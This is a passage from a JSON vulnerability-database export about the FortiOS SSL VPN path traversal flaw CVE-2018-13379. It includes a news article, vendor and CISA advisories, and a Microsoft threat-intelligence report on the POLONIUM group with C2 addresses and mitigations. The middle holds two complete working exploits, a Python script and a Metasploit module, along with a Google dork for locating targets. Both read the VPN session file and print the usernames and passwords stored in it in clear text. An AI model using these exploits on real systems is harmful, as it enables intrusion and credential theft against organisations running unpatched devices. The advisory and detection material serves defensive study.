[CVE-2021-21985](<https://nvd.nist.gov/vuln/detail/CVE-2021-21985>)\n * Fortinet: [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), [CVE-2020-12812](<https://nvd.nist.gov/vuln/detail/CVE-2020-12812>), and [CVE-2019-5591](<https://nvd.nist.gov/vuln/detail/CVE-2019-5591>)\n\nThe development also comes a week after MITRE [published](<https://cwe.mitre.org/top25/archive/2021/2021_cwe_top25.html>) a list of top 25 \"most dangerous\" software errors that could lead to serious vulnerabilities that could be exploited by an adversary to take control of an affected system, obtain sensitive information, or cause a denial-of-service condition.\n\n\"The advisory [...] puts the power in every organisation's hands to fix the most common vulnerabilities, such as unpatched VPN gateway devices,\" NCSC Director for Operations, Paul Chichester, [said](<https://www.ncsc.gov.uk/news/global-cyber-vulnerabilities-advice>), urging the need to prioritize patching to minimize the risk of being exploited by malicious actors.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-07-29T08:21:00", "type": "thn", "title": "Top 30 Critical Security Vulnerabilities Most Exploited by Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-13379", "CVE-2018-7600", "CVE-2019-0604", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2019-5591", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-12812", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-5902", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-08-04T09:03:14", "id": "THN:B95DC27A89565323F0F8E6350D24D801", "href": "https://thehackernews.com/2021/07/top-30-critical-security.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "fortinet": [{"lastseen": "2022-04-28T11:34:17", "description": "A path traversal vulnerability in the FortiProxy SSL VPN web portal may allow a non-authenticated, remote attacker to download FortiProxy system files through specially crafted HTTP resource requests.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-01T00:00:00", "type": "fortinet", "title": "FortiProxy - system file leak through SSL VPN special crafted HTTP resource requests", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2021-06-01T00:00:00", "id": "FG-IR-20-233", "href": "https://www.fortiguard.com/psirt/FG-IR-20-233", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-04-28T11:44:25", "description": "A path traversal vulnerability in the FortiOS SSL VPN web portal may allow an unauthenticated attacker to download FortiOS system files through specially crafted HTTP resource requests.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-05-24T00:00:00", "type": "fortinet", "title": "FortiOS system file leak through SSL VPN via specially crafted HTTP resource requests", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2019-05-24T00:00:00", "id": "FG-IR-18-384", "href": "https://www.fortiguard.com/psirt/FG-IR-18-384", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:16", "description": "\nFortiOS 5.6.3 - 5.6.7 FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-08-19T00:00:00", "type": "exploitpack", "title": "FortiOS 5.6.3 - 5.6.7 FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2019-08-19T00:00:00", "id": "EXPLOITPACK:6EF33E509C6C5002F8E81022F84C01B5", "href": "", "sourceData": "# Exploit Title: FortiOS Leak file - Reading login/passwords in clear text.\n# Google Dork: intext:\"Please Login\" inurl:\"/remote/login\"\n# Date: 17/08/2019\n# Exploit Author: Carlos E. Vieira\n# Vendor Homepage: https://www.fortinet.com/\n# Software Link: https://www.fortinet.com/products/fortigate/fortios.html\n# Version: This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).\n# Tested on: 5.6.6\n# CVE : CVE-2018-13379\n\n# Exploit SSLVPN Fortinet - FortiOs\n#!/usr/bin/env python\nimport requests, sys, time\nimport urllib3\nurllib3.disable_warnings()\n\n\ndef leak(host, port):\n\tprint(\"[!] Leak information...\")\n\ttry:\n\t\turl = \"https://\"+host+\":\"+port+\"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession\"\n\t\theaders = {\"User-Agent\": \"Mozilla/5.0\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\", \"Accept-Language\": \"en-US,en;q=0.5\", \"Accept-Encoding\": \"gzip, deflate\", \"Connection\": \"close\", \"Upgrade-Insecure-Requests\": \"1\"}\t\t\n\t\tr=requests.get(url, headers=headers, verify=False, stream=True)\n\t\timg=r.raw.read()\n\t\tif \"var fgt_lang =\" in str(img):\n\t\t\twith open(\"sslvpn_websession_\"+host+\".dat\", 'w') as f:\n\t\t\t\tf.write(img)\t\t\n\t\t\tprint(\"[>] Save to file ....\")\n\t\t\tparse(host)\n\t\t\tprint(\"\\n\")\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\texcept requests.exceptions.ConnectionError:\n\t\treturn False\ndef is_character_printable(s):\n\treturn all((ord(c) < 127) and (ord(c) >= 32) for c in s)\n\ndef is_printable(byte):\n\tif is_character_printable(byte):\n \t\treturn byte\n \telse:\n \t\treturn '.' \n\ndef read_bytes(host, chunksize=8192):\n\tprint(\"[>] Read bytes from > \" + \"sslvpn_websession\"+host+\".dat\")\n\twith open(\"sslvpn_websession_\"+host+\".dat\", \"rb\") as f:\n \t\twhile True:\n \t\tchunk = f.read(chunksize)\n \t\tif chunk:\n \t\t\tfor b in chunk:\n \t\t\t\tyield b\n \t\telse:\n \t\t\tbreak\ndef parse(host):\n print(\"[!] Parsing Information...\")\n memory_address = 0\n ascii_string = \"\"\n for byte in read_bytes(host):\n \tascii_string = ascii_string + is_printable(byte)\n\tif memory_address%61 == 60:\n\t\tif ascii_string!=\".............................................................\":\n\t \t\tprint ascii_string\n\t \tascii_string = \"\"\n\tmemory_address = memory_address + 1\n\ndef check(host, port):\n print(\"[!] Check vuln...\")\n uri = \"/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession\"\n try:\n r = requests.get(\"https://\" + host + \":\" + port + uri, verify=False)\n if(r.status_code == 200):\n return True\n elif(r.status_code == 404):\n return False\n else:\n return False\n except:\n return False\ndef main(host, port):\n print(\"[+] Start exploiting....\")\n vuln = check(host, port)\n if(vuln):\n print(\"[+] Target is vulnerable!\")\n bin_file = leak(host, port)\n else:\n print(\"[X] Target not vulnerable.\")\n\nif __name__ == \"__main__\":\n\n if(len(sys.argv) < 3):\n print(\"Use: python {} ip/dns port\".format(sys.argv[0]))\n else:\n host = sys.argv[1]\n port = sys.argv[2]\n main(host, port)", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-01T19:04:16", "description": "\nFortiOS 5.6.3 - 5.6.7 FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure (Metasploit)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-08-19T00:00:00", "type": "exploitpack", "title": "FortiOS 5.6.3 - 5.6.7 FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure (Metasploit)", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2019-08-19T00:00:00", "id": "EXPLOITPACK:E222442D181419B052AACE6DA4BC8485", "href": "", "sourceData": "# Exploit Title: FortiOS Leak file - Reading login/passwords in clear text.\n# Google Dork: intext:\"Please Login\" inurl:\"/remote/login\"\n# Date: 17/08/2019\n# Exploit Author: Carlos E. Vieira\n# Vendor Homepage: https://www.fortinet.com/\n# Software Link: https://www.fortinet.com/products/fortigate/fortios.html\n# Version: This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).\n# Tested on: 5.6.6\n# CVE : CVE-2018-13379\n\nrequire 'msf/core'\nclass MetasploitModule < Msf::Auxiliary\n\tinclude Msf::Exploit::Remote::HttpClient\n\tinclude Msf::Post::File \n\tdef initialize(info = {})\n\t\tsuper(update_info(info,\n\t\t\t'Name' => 'SSL VPN FortiOs - System file leak',\n\t\t\t'Description' => %q{\n\t\t\t\tFortiOS system file leak through SSL VPN via specially crafted HTTP resource requests.\n\t\t\t\tThis exploit read /dev/cmdb/sslvpn_websession file, this file contains login and passwords in (clear/text).\n\t\t\t\tThis vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).\n\t\t\t},\n\t\t\t'References' =>\n\t\t\t [\n\t\t\t [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379' ]\n\t\t\t ],\n\t\t\t'Author' => [ 'lynx (Carlos Vieira)' ],\n\t\t\t'License' => MSF_LICENSE,\n\t\t\t 'DefaultOptions' =>\n\t\t {\n\t\t 'RPORT' => 443,\n\t\t 'SSL' => true\n\t\t },\n\t\t\t))\n\n\tend\n\n\n\tdef run()\n\t\tprint_good(\"Checking target...\")\n\t\tres = send_request_raw({'uri'=>'/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession'})\n\n\t\tif res && res.code == 200\n\t\t\tprint_good(\"Target is Vulnerable!\")\n\t\t\tdata = res.body\n\t\t\tcurrent_host = datastore['RHOST']\n\t\t\tfilename = \"msf_sslwebsession_\"+current_host+\".bin\"\n\t\t\tFile.delete(filename) if File.exist?(filename)\n\t\t\tfile_local_write(filename, data)\n\t\t\tprint_good(\"Parsing binary file.......\")\n\t\t\tparse()\n\t\telse\n\t\t\tif(res && res.code == 404)\n\t\t\t\tprint_error(\"Target not Vulnerable\")\n\t\t\telse\n\t\t\t\tprint_error(\"Ow crap, try again...\")\n\t\t\tend\n\t\tend\n\tend\n\tdef parse()\n\t\tcurrent_host = datastore['RHOST']\n\n\t fileObj = File.new(\"msf_sslwebsession_\"+current_host+\".bin\", \"r\")\n\t words = 0\n\t while (line = fileObj.gets)\n\t \tprintable_data = line.gsub(/[^[:print:]]/, '.')\n\t \tarray_data = printable_data.scan(/.{1,60}/m)\n\t \tfor ar in array_data\n\t \t\tif ar != \"............................................................\"\n\t \t\t\tprint_good(ar)\n\t \t\tend\n\t \tend\n\t \t#print_good(printable_data)\n\t \t\n\t\tend\t\n\t\tfileObj.close\t\n\tend\nend", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "An Improper Limitation of a Pathname to a Restricted Directory (\"Path Traversal\") in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Fortinet FortiOS SSL VPN credential exposure vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2018-13379", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "mmpc": [{"lastseen": "2022-06-06T10:58:37", "description": "Microsoft successfully detected and disabled attack activity abusing OneDrive by a previously undocumented Lebanon-based activity group Microsoft Threat Intelligence Center (MSTIC) tracks as POLONIUM. The associated indicators and tactics were used by the OneDrive team to improve detection of attack activity and disable offending actor accounts. To further address this abuse, Microsoft has suspended more than 20 malicious OneDrive applications created by POLONIUM actors, notified affected organizations, and deployed a series of security intelligence updates that will quarantine tools developed by POLONIUM operators. Our goal with this blog is to help deter future activity by exposing and sharing the POLONIUM tactics with the community at large.\n\nMSTIC assesses with high confidence that POLONIUM represents an operational group based in Lebanon. We also assess with moderate confidence that the observed activity was coordinated with other actors affiliated with Iran\u2019s Ministry of Intelligence and Security (MOIS), based primarily on victim overlap and commonality of tools and techniques. Such collaboration or direction from Tehran would align with a string of revelations since late 2020 that the Government of Iran is using third parties to carry out cyber operations on their behalf, likely to enhance Iran\u2019s plausible deniability.\n\nPOLONIUM has targeted or compromised more than 20 organizations based in Israel and one intergovernmental organization with operations in Lebanon over the past three months. This actor has deployed unique tools that abuse legitimate cloud services for command and control (C2) across most of their victims. POLONIUM was observed creating and using legitimate OneDrive accounts, then utilizing those accounts as C2 to execute part of their attack operation. This activity does not represent any security issues or vulnerabilities on the OneDrive platform. In addition, MSTIC does not, at present, see any links between this activity and other publicly documented groups linked to Lebanon like Volatile Cedar. This blog will also expose further details that show Iranian threat actors may be collaborating with proxies to operationalize their attacks. Microsoft continues to work across its platforms to identify abuse, take down malicious activity, and implement new proactive protections to discourage malicious actors from using our services.\n\nAs with any observed nation-state actor activity, Microsoft directly notifies customers that have been targeted or compromised, providing them with the information they need to secure their accounts.\n\n## Observed actor activity\n\nSince February 2022, POLONIUM has been observed primarily targeting organizations in Israel with a focus on critical manufacturing, IT, and Israel\u2019s defense industry. In at least one case, POLONIUM\u2019s compromise of an IT company was used to target a downstream aviation company and law firm in a supply chain attack that relied on service provider credentials to gain access to the targeted networks. Multiple manufacturing companies they targeted also serve Israel\u2019s defense industry, indicating a POLONIUM tactic that follows an increasing trend by many actors, including among several Iranian groups, of targeting service provider access to gain downstream access. Observed victim organizations were in the following sectors: critical manufacturing, information technology, transportation systems, defense industrial base, government agencies and services, food and agriculture, financial services, healthcare and public health, and other business types.\n\n### POLONIUM TTPs shared with Iran-based nation-state actors\n\nMSTIC assesses with moderate confidence that POLONIUM is coordinating its operations with multiple tracked actor groups affiliated with Iran\u2019s Ministry of Intelligence and Security (MOIS), based on victim overlap and the following common techniques and tooling:\n\n * **Common unique victim targeting: **MSTIC has observed POLONIUM active on or targeting multiple victims that MERCURY previously compromised. According to the [US Cyber Command](<https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/>), MuddyWater, a group we track as MERCURY, \u201cis a subordinate element within the Iranian Ministry of Intelligence and Security.\u201d\n * **Evidence of possible \u201chand-off\u201d operations:** The uniqueness of the victim organizations suggests a convergence of mission requirements with MOIS. It may also be evidence of a \u2018hand-off\u2019 operational model where MOIS provides POLONIUM with access to previously compromised victim environments to execute new activity. MSTIC continues to monitor both actors to further verify this \u2018hand-off\u2019 hypothesis.\n * **Use of OneDrive for C2: ** MSTIC has observed both POLONIUM and DEV-0133 (aka [Lyceum](<https://www.secureworks.com/blog/lyceum-takes-center-stage-in-middle-east-campaign>)) using cloud services, including OneDrive, for data exfiltration and command and control. \n * **Use of AirVPN: **Both POLONIUM and DEV-0588 (aka CopyKittens) commonly use AirVPN for operational activity. While use of public VPN services is common across many actor sets, these actors\u2019 specific choice to use AirVPN, combined with the additional overlaps documented above, further supports the moderate confidence assessment that POLONIUM collaborates with MOIS.\n\n### Abuse of cloud services\n\nPOLONIUM has been observed deploying a series of custom implants that utilize cloud services for command and control as well as data exfiltration. MSTIC has observed implants connecting to POLONIUM-owned accounts in OneDrive and Dropbox. These tools are detected as the following malware:\n\n * Trojan:PowerShell/CreepyDrive.A!dha\n * Trojan:PowerShell/CreepyDrive.B!dha\n * Trojan:PowerShell/CreepyDrive.C!dha\n * Trojan:PowerShell/CreepyDrive.D!dha\n * Trojan:PowerShell/CreepyDrive.E!dha\n * Trojan:MSIL/CreepyBox.A!dha\n * Trojan:MSIL/CreepyBox.B!dha\n * Trojan:MSIL/CreepyBox.C!dha\n\nWhile OneDrive performs antivirus scanning on all uploaded content, POLONIUM is not using the cloud service to host their malware. If malware was hosted in the OneDrive account, Microsoft Defender Antivirus detections would block it. Instead, they are interacting with the cloud service in the same way that a legitimate customer would. OneDrive is partnering with MSTIC to identify and disable accounts that are linked to known adversary behavior.\n\n### CreepyDrive analysis\n\nThe CreepyDrive implant utilizes a POLONIUM-owned OneDrive storage account for command and control. The implant provides basic functionality of allowing the threat actor to upload stolen files and download files to run.\n\nAll web requests by the CreepyDrive implant use the _Invoke-WebRequest_ cmdlet. The implant\u2019s logic is wrapped in a _while true_ loop, ensuring continuous execution of the implant once running. The implant contains no native persistence mechanism; if terminated it would need to be re-executed by the threat actor.\n\nDue to the lack of victim identifiers in the CreepyDrive implant, using the same OneDrive account for multiple victims, while possible, may be challenging. It\u2019s likely that a different threat actor-controlled OneDrive account is used per implant.\n\n##### **Getting an OAuth token**\n\nWhen run, the implant first needs to authenticate with OneDrive. The threat actor incorporated a refresh token within the implant. Refresh tokens are part of the Open Authorization 2 (OAuth) specification, allowing a new OAuth token to be issued when it expires. There are several mechanisms that make token theft difficult, including the use of the trusted platform module (TPM) to protect secrets. More information on these mechanisms can be found [here](<https://docs.microsoft.com/en-us/azure/active-directory/devices/concept-primary-refresh-token>).\n\nIn this instance, the protection settings tied to the OneDrive account are fully controlled by the threat actor, allowing them to disable protections that prevent the theft of the token and client secrets. As the threat actor is in full control of all secrets and key material associated with the account, their sign-in activity looks like legitimate customer behavior and is thus challenging to detect.\n\nThis token and client secret are transmitted in the body of request to a legitimate Microsoft endpoint to generate an OAuth token:\n \n \n https[://]login.microsoftonline.com/consumers/oauth2/v2.0/token\n\nThis request provides the requisite OAuth token for the implant to interact with the threat actor-owned OneDrive account. Using this OAuth token, the implant makes a request to the following Microsoft Graph API endpoint to access the file _data.txt_:\n \n \n https[://]graph.microsoft.com/v1.0/me/drive/root:/Documents/data.txt:/content\n\nThe file _data.txt_ acts as the primary tasking mechanism for the implant, providing three branches of execution.\n\n**Upload**\n\nThe first branch is triggered when the word \u201cupload\u201d is provided in the response. This response payload also contains two additional elements: a local file path to upload, and what is likely a threat actor-defined remote file name to upload the local file into. The request is structured as follows:\n \n \n https[://]graph.microsoft.com/v1.0/me/drive/root:/Uploaded/???:/content\n\n**Download**\n\nThe second branch is triggered when the word \u201cdownload\u201d is provided in the response. This response payload contains a file name to download from the threat actor-owned OneDrive account. The request is structured as follows:\n \n \n https[://]graph.microsoft.com/v1.0/me/drive/root:/Downloaded/???:/content\n\n**Execute**\n\nThis branch is triggered when no command is provided in the response. The response payload can contain either an array of commands to execute or file paths to files previously downloaded by the implant. The threat actor can also provide a mixture of individual commands and file paths.\n\nEach value from the array is passed individually into the below custom function, which uses the _Invoke-Expression_ cmdlet to run commands:\n\n\n\nThe output of each executed command is aggregated and then written back to the following location in the threat actor-owned OneDrive account:\n \n \n https[://]graph.microsoft.com/v1.0/me/drive/root:/Documents/response.json:/content\n\nDuring the execution of this mechanism, the threat actor resets the content of the original tasking file _data.txt_ with the following request:\n \n \n https[://]graph.microsoft.com/v1.0/me/drive/root:/Documents/data.txt:/content\n\nFinally, the CreepyDrive implant sleeps, re-executing in a loop until the process is terminated.\n\n### Use of custom implant\n\nPOLONIUM has also been observed deploying a custom PowerShell implant detected as Backdoor:PowerShell/CreepySnail.B!dha. The C2s for observed CreepySnail implants include:\n\n * 135[.]125[.]147[.]170:80\n * 185[.]244[.]129[.]79:63047\n * 185[.]244[.]129[.]79:80\n * 45[.]80[.]149[.]108:63047\n * 45[.]80[.]149[.]108:80\n * 45[.]80[.]149[.]57:63047\n * 45[.]80[.]149[.]68:63047\n * 45[.]80[.]149[.]71:80\n\nThe code below demonstrates how the CreepySnail PowerShell implant, once deployed on a target network, attempts to authenticate using stolen credentials and connect to POLONIUM C2 for further actions on objectives, such as data exfiltration or further abuse as C2.\n\n  \n\n### Use of commodity tools\n\nPOLONIUM has also been observed dropping a secondary payload via their OneDrive implant. POLONIUM used a common SSH tool for automating interactive sign-ins called _plink_ to set up a redundant tunnel from the victim environment to the attacker-controlled infrastructure.\n\nThe observed C2 IP addresses for POLONIUM plink tunnels include:\n\n * 185[.]244[.]129 [.]109\n * 172[.]96[.]188[.]51\n * 51[.]83 [.]246 [.]73\n\n### Exploitation\n\nWhile we continue to pursue confirmation of how POLONIUM gained initial access to many of their victims, MSTIC notes that approximately 80% of the observed victims beaconing to _graph.microsoft.com_ were running Fortinet appliances. This suggests, but does not definitively prove, that POLONIUM compromised these Fortinet devices by exploiting the [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>) vulnerability to gain access to the compromised organizations.\n\n### IT supply chain attacks\n\nIn one case, POLONIUM compromised a cloud service provider based in Israel and likely used this access to compromise downstream customers of the service provider. Specifically, MSTIC observed that POLONIUM pivoted through the service provider and gained access to a law firm and an aviation company in Israel. The tactic of leveraging IT products and service providers to gain access to downstream customers remains a favorite of Iranian actors and their proxies.\n\nMicrosoft will continue to monitor ongoing activity from POLONIUM and the other Iranian MOIS-affiliated actors discussed in this blog and implement protections for our customers. The current detections, advanced detections, and IOCs in place across our security products are detailed below.\n\n## Recommended customer actions\n\nThe techniques used by the actor described in the \u201cObserved actor activity\u201d section can be mitigated by adopting the security considerations provided below:\n\n * Use the included indicators of compromise to investigate whether they exist in your environment and assess for potential intrusion. [Microsoft Sentinel](<https://azure.microsoft.com/services/microsoft-sentinel/#overview>) queries are provided in the advanced hunting section below.\n * Confirm that Microsoft Defender Antivirus is updated to [security intelligence update 1.365.40.0 or later](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/manage-updates-baselines-microsoft-defender-antivirus>), or ensure that [cloud protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/cloud-protection-microsoft-defender-antivirus>) is turned on, to detect the related indicators.\n * Block in-bound traffic from IPs specified in the \u201cIndicators of compromise\u201d table.\n * Review all authentication activity for remote access infrastructure (VPNs), with a particular focus on accounts configured with single factor authentication, to confirm authenticity and investigate any anomalous activity.\n * Enable multifactor authentication (MFA) to mitigate potentially compromised credentials and ensure that MFA is enforced for all remote connectivity. _NOTE:_ Microsoft strongly encourages all customers download and use passwordless solutions like [Microsoft Authenticator](<https://www.microsoft.com/account/authenticator/>) to secure your accounts.\n * For customers that have relationships with service providers, [review and audit partner relationships](<https://docs.microsoft.com/microsoft-365/commerce/manage-partners?view=o365-worldwide>) to minimize any unnecessary permissions between your organization and upstream providers. Microsoft recommends immediately removing access for any partner relationships that look unfamiliar or have not yet been audited.\n\n## Indicators of compromise (IOCs)\n\nThe below list provides IOCs observed during our investigation. We encourage our customers to investigate these indicators in their environments and implement detections and protections to identify past related activity and prevent future attacks against their systems.\n\n**Indicator**| **Type**| **Description** \n---|---|--- \n135[.]125[.]147[.]170:80| IPv4 address| C2 for POLONIUM CreepySnail implant \n185[.]244[.]129[.]79:63047| IPv4 address| C2 for POLONIUM CreepySnail implant \n185[.]244[.]129[.]79:80| IPv4 address| C2 for POLONIUM CreepySnail implant \n45[.]80[.]149[.]108:63047| IPv4 address| C2 for POLONIUM CreepySnail implant \n45[.]80[.]149[.]108:80| IPv4 address| C2 for POLONIUM CreepySnail implant \n45[.]80[.]149[.]57:63047| IPv4 address| C2 for POLONIUM CreepySnail implant \n45[.]80[.]149[.]68:63047| IPv4 address| C2 for POLONIUM CreepySnail implant \n45[.]80[.]149[.]71:80| IPv4 address| C2 for POLONIUM CreepySnail implant \n185[.]244[.]129[.]109| IPv4 address| C2 for POLONIUM plink tunnels \n172[.]96[.]188[.]51| IPv4 address| C2 for POLONIUM plink tunnels \n51[.]83[.]246[.]73| IPv4 address| C2 for POLONIUM plink tunnels \nTrojan:PowerShell/CreepyDrive.A!dha| Tool| Custom implant signature 